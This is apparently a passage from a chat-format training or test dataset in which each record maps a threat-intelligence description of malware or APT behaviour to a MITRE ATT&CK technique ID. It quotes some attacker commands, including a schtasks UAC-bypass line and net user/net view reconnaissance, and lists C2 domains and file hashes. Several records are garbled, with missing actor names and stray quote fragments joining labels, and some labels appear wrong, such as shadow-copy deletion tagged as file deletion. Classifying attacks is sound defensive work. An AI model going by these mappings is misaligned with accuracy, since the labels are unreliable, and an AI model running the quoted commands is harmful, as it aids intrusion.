- "content": "T1064 - Scripting', 'T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "EvilBunny has exploited CVE-2011-4369, a vulnerability in the PRC component in Adobe Reader."
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kinsing was executed with an Ubuntu container entry point that runs shell scripts."
- },
- {
- "role": "assistant",
- "content": "T1609 - Kubernetes Exec Into Container"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This time, APT15 opted for a DNS based backdoor: RoyalDNS. The persistence mechanism used by RoyalDNS was achieved through a service called ‘Nwsapagent"
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "At this stage the malware disables the Windows screen saver, then changes both the desktop wallpaper and the lock screen images to a custom image. These are the pair of identical JPEG and BMP images presenting the logo of Iran’s Railways and the message similar to the one displayed on the platform boards of different railway stations in Iran"
- },
- {
- "role": "assistant",
- "content": "T1491.001 - Defacement: Internal Defacement"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In one example, BRONZE UNION actors leveraged initial web shell access on Internet-facing systems to conduct internal reconnaissance, including domain enumeration and network state, via ipconfig, net use, net user, and net view commands"
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GravityRAT has a feature to list the available services on the system."
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Bazar loader files are dual-extension executable files (such as PreviewReport.DOC.exe) signed with fake certificates such as VB CORPORATE PTY. This is consistent with the Trickbot group, which notoriously abuses the trust of certificate authorities by using signed loaders and malware to evade security product detection"
- },
- {
- "role": "assistant",
- "content": "T1036.007 - Masquerading: Double File Extension"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT1 has used RAR to compress files before moving them outside of the victim network."
- },
- {
- "role": "assistant",
- "content": "T1560.001 - Archive Collected Data: Archive via Utility"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "deletes shadow copies from the victim."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZIRCONIUM has exploited CVE-2017-0005 for local privilege escalation."
- },
- {
- "role": "assistant",
- "content": "T1068 - Exploitation for Privilege Escalation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In another engagement, we observed the adversary using Mimikatz (the official signed version) to access credentials for logon (T1003.001: LSASS Memory"
- },
- {
- "role": "assistant",
- "content": "T1003.001 - OS Credential Dumping: LSASS Memory"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lokibot embedded the commands \"schtasks /Run /TN \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I\" inside a batch script."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NBTscan can list active users on the system."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses the net user command."
- },
- {
- "role": "assistant",
- "content": "T1087 - Account Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Winnti for Windows HTTP/S C2 mode can make use of a local proxy."
- },
- {
- "role": "assistant",
- "content": "T1090.001 - Proxy: Internal Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WannaCry attempts to kill processes associated with Exchange, Microsoft SQL Server, and MySQL to make it possible to encrypt their data stores."
- },
- {
- "role": "assistant",
- "content": "T1489 - Service Stop"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The button would then lead to the download a RAR archive named Adobe_Flash_Install.rar. This archive was designed to fool the targeted user into infected themselves with a Cobalt Strike implant. Details on the contents of this file are included later in this report"
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The file name AcroRD32.exe, a legitimate process name for Adobe's Acrobat Reader, was used by as a name for malware."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bankshot gathers domain and account names/information through process monitoring."
- },
- {
- "role": "assistant",
- "content": "T1087.001 - Account Discovery: Local Account', 'T1087.002 - Account Discovery: Domain Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used CVE-2014-6324 to escalate privileges."
- },
- {
- "role": "assistant",
- "content": "T1068 - Exploitation for Privilege Escalation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CSPY Downloader can use GET requests to download additional payloads from C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chinese state-sponsored cyber actors have been observed using benign executables which used Dynamic Link Library (DLL) loadorder hijacking to activate the malware installation process."
- },
- {
- "role": "assistant",
- "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Interestingly as we continued to expand and pivot in our data set, one of the C2 IPs used by an IRC bot payload from Magic Hound was found to be the same IP used to deliver a different IRC bot called MPK"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RainyDay can use HTTP in C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Astaroth uses a fromCharCode() deobfuscation method to avoid explicitly writing execution commands and to hide its code."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Crutch is able to bypass some security layers by abusing legitimate infrastructure – here Dropbox – in order to blend into normal network traffic while exfiltrating stolen documents and receiving commands from its operators"
- },
- {
- "role": "assistant",
- "content": "T1102.002 - Bidirectional Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It communicates with ftp.bytehost31[.]org via FTP for command and control (C2)"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Remsec can obtain information about the current user."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used regsvr32 for execution."
- },
- {
- "role": "assistant",
- "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HotCroissant has the ability to collect the username on the infected host."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malicious modules in regsvr32.exe memory After the Irdsnhrxxxfery98 module is loaded, the malware searches different processes to continue its malicious activity depending on the way Irdsnhrxxxfery64 was loaded"
- },
- {
- "role": "assistant",
- "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kobalos can record the IP address of the target machine."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If running with \"root\" permissions, OSX_OCEANLOTUS.D can create a persistence file in the folder \"/Library/LaunchDaemons\"."
- },
- {
- "role": "assistant",
- "content": "T1543.004 - Create or Modify System Process: Launch Daemon"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In 2018, CTU researchers observed several GOLD KINGSWOOD campaigns involving SpicyOmelette, a tool used by the group during initial exploitation of an organization. This sophisticated JavaScript remote access tool is generally delivered via phishing, and it uses multiple defense evasion techniques to hinder prevention and detection activities. GOLD KINGSWOOD delivered SpicyOmelette through a phishing email containing a shortened link that appeared to be a PDF document attachment. When clicked, the link used the Google AppEngine to redirect the system to a GOLD KINGSWOOD-controlled Amazon Web Services (AWS) URL that installed a signed JavaScript file, which was SpicyOmelette"
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "On Sunday August 24, 2014 we observed a spear phish email sent to a Taiwanese government ministry. Attached to this email was a malicious Microsoft Word document (MD5: f6fafb7c30b1114befc93f39d0698560) that exploited CVE-2012-0158. It is worth noting that this email appeared to have been sent from another Taiwanese Government employee, implying that the email was sent from a valid but compromised account"
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File', 'T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lokibot has used \"cmd /c\" commands embedded within batch scripts."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is capable of keylogging."
- },
- {
- "role": "assistant",
- "content": "T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "captures screenshots based on specific keywords in the window’s title."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used the meek domain fronting plugin for Tor to hide the destination of C2 traffic."
- },
- {
- "role": "assistant",
- "content": "T1090.004 - Domain Fronting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This final cluster appears to serve as the C2 infrastructure for a custom remote administration tool called Pteranodon. It is capable of downloading and executing files, capturing screenshots and executing arbitrary commands on compromised systems"
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Metamorfo has collected the hostname and operating system version from the compromised host."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OSX_OCEANLOTUS.D can collect the network interface MAC address on the infected host."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MacMa can enumerate running processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FlawedAmmyy has used `rundll32` for execution."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Group leveraged an open-source tool called SoftPerfect Network Scanner to perform network scanning."
- },
- {
- "role": "assistant",
- "content": "T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The actors used a Powershell cmdlet (NewManagementRoleAssignment) to grant the 'ApplicationImpersonation' role to a compromised account."
- },
- {
- "role": "assistant",
- "content": "T1098.002 - Account Manipulation: Additional Email Delegate Permissions"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "EVILNUM has used a one-way communication method via GitLab and Digital Point to perform C2."
- },
- {
- "role": "assistant",
- "content": "T1102.003 - One-Way Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Many samples were programmed using Borland Delphi, which will mangle the default PE compile timestamp of a file."
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Comnie will make requests to these URLs, looking for base64-encoded data after an identifier of ‘magnet:/’, as seen in the example below: Figure 14 GitHub storing Comnie C2 information In the example above, the C2 information is being stored within the user’s URL parameter within GitHub"
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service', 'T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FormatLoader’s main purpose is to infect the machine with an additional malicious file by downloading the binary to the compromised machine. To do so, the malware adds digits from the hardcoded range one by one to the hardcoded format strings, and accesses the download links."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The OsInfo function in Komplex collects the current running username."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "malware ISMAgent falls back to its DNS tunneling mechanism if it is unable to reach the C2 server over HTTP."
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Taidoor can search for specific files."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ursnif has dropped payload and configuration files to disk. Ursnif has also been used to download and execute additional payloads."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "contains modules to infect USB sticks and spread laterally to other Windows systems the stick is plugged into using autorun functionality."
- },
- {
- "role": "assistant",
- "content": "T1091 - Replication Through Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cuba has executed hidden PowerShell windows."
- },
- {
- "role": "assistant",
- "content": "T1564.003 - Hide Artifacts: Hidden Window"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RATANKBA runs the \"net view /domain\" and \"net view\" commands."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT37 has a function in the initial dropper to bypass Windows UAC in order to execute the next payload with higher privileges."
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SUGARDUMP can identify Chrome, Opera, Edge Chromium, and Firefox browsers, including version number, on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1518 - Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A Patchwork payload has searched all fixed drives on the victim for files matching a specified list of extensions."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has dumped credentials, including by using ."
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "encoded C2 traffic with base64."
- },
- {
- "role": "assistant",
- "content": "T1132 - Data Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Several files were downloaded to our Struts2 honeypot from the Chinese repository site gitee.com for a user named \"c-999. Around the same time, we observed similar activity pulling down files from a gitlab.com repository page for a user named \"c-18. All the repositories had a folder called \"ss\" that contained 16 files. The files were a collection of ELF executables, shell scripts, and text files that execute a variety of actions, including achieving persistence and the execution of an illicit cryptocurrency miner. Once the threat actor had compromised a system, they achieved persistence on the device by installing a cron job that downloads and executes a file \"logo.jpg\" from \"3389[.]space. This file is a shell script which, in turn, downloads mining executables from the threat actor's Git repositories and saves them under the filename \"java. The exact file downloaded depends on the victim's system architecture"
- },
- {
- "role": "assistant",
- "content": "T1053.003 - Scheduled Task/Job: Cron"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This function keeps receiving data from the system clipboard and then determines if it is a valid bitcoin wallet address. If yes, it overwrites the wallet address with the attacker’s"
- },
- {
- "role": "assistant",
- "content": "T1115 - Clipboard Data', 'T1565.002 - Transmitted Data Manipulation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT3 (also known as UPS), the actors responsible for Operation Clandestine Fox has quietly continued to send waves of spearphishing messages over the past few months. This actor initiated their most recent campaign on November 19, 2014 targeting multiple organizations. The attacker leveraged multiple exploits, targeting both CVE-2014-6332 and CVE-2014-4113. CVE-2014-6332 was disclosed publicly on 2014-11-11 and is a Windows OLE Automation Array Remote Code Execution vulnerability. CVE-2014-4113 is a privilege escalation vulnerability that was disclosed publicly on 2014-10-14."
- },
- {
- "role": "assistant",
- "content": "T1587.004 - Exploits', 'T1566.003 - Spearphishing via Service', 'T1534 - Internal Spearphishing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "At first glance, these links generally cause less suspicion for the targets. After opening the links and several redirections, the victims are led to final phishing domains such as “mobile[.]recover-session-service[.]site” etc"
- },
- {
- "role": "assistant",
- "content": "T1583.001 - Domains"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Indicators of compromise MITRE ATT&CK techniques Modify existing service Code signing File deletion Deobfuscate/decode files or information System information discovery Process discovery Service execution RunDLL32 Scripting Command-line Interface Data from local system Automated exfiltration Data encrypted Commonly used port Bypass user account control Hashes fe32d29fa16b1b71cd27b23a78ee9f6b7791bff3 f684e15dd2e84bac49ea9b89f9b2646dc32a2477 1d280a77595a2d2bbd36b9b5d958f99be20f8e06 19d9573f0b2c2100accd562cc82d57adb12a57ec f90a2155ac492c3c2d5e1d83e384e1a734e59cc0 9b832dda912cce6b23da8abf3881fcf4d2b7ce09 f3b62fea38cb44e15984d941445d24e6b309bc7b 66d2cea01b46c3353f4339a986a97b24ed89ee18 7113aaab61cacb6086c5531a453adf82ca7e7d03 d41daba0ebfa55d0c769ccfc03dbf6a5221e006a 25f4819e7948086d46df8de2eeeaa2b9ec6eca8c 35ab747c15c20da29a14e8b46c07c0448cef4999 e87de3747d7c12c1eea9e73d3c2fb085b5ae8b42 0e4a7c0242b98723dc2b8cce1fbf1a43dd025cf0 bca861a46d60831a3101c50f80a6d626fa99bf16 01530adb3f947fabebae5d9c04fb69f9000c3cef 4229896d61a5ad57ed5c247228606ce62c7032d0 4c7e975f95ebc47423923b855a7530af52977f57 5a6ad7a1c566204a92dd269312d1156d51e61dc4 1dc50bfcab2bc80587ac900c03e23afcbe243f64 003e21b02be3248ff72cc2bfcd05bb161b6a2356 9b7c3c48bcef6330e3086de592b3223eb198744a 85e2453b37602429596c9681a8c58a5c6faf8d0c Domains ftp.byethost31.com ftp.byethost11.com 1113427185.ifastnet.org navermail.byethost3.com nihon.byethost3.com"
- },
- {
- "role": "assistant",
- "content": "T1048 - Exfiltration Over Alternative Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "None of the known documents contain a lure image or message to instruct the recipient to click the Enable Content button necessary to run the macro, as seen in Figure 1"
- },
- {
- "role": "assistant",
- "content": "T1204 - User Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
